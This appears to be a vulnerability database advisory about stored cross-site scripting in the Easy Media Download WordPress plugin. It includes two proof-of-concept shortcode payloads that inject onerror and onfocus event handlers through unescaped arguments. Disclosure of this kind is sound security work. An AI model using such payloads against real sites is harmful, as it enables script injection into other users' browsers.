The plugin does not escape the text argument of its shortcode, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks.
Affected argument: url, text, target, rel and class [easy_media_download url="/" text='" onerror="alert(/XSS/)//http'] [easy_media_download url="/" text="a" target='"autofocus onfocus=alert(/XSS/)//']
apple502j
apple502j
Yes
2021-09-22 (about 1 years ago)
2021-09-22 (about 1 years ago)
2023-02-03 (about 3 months ago)